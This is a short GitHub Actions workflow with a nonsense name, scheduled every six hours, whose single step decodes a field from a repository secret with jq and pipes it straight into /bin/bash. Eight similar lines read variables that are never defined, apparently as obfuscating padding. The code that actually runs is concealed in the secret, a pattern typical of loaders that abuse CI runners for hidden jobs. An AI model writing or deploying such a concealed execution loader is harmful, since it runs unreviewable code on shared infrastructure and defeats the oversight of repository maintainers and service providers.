name: scoldingcatnip

on:
  workflow_dispatch:
  schedule:
    - cron: '28 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: scoldingcatnip
        env:
          o3694: ${{ secrets.o3694 }}
        run: |
          echo $o3694 | jq -r .g01 | /bin/bash
          echo $bw77 | jq -r .c549 | /bin/bash
          echo $iftvq2363 | jq -r .xtvlg704 | /bin/bash
          echo $x199 | jq -r .yxz043 | /bin/bash
          echo $za012 | jq -r .qwui9537 | /bin/bash
          echo $vh84 | jq -r .y34238 | /bin/bash
          echo $cz5 | jq -r .l3 | /bin/bash
          echo $us19 | jq -r .tlmhe97509 | /bin/bash
          echo $o615 | jq -r .jue108 | /bin/bash

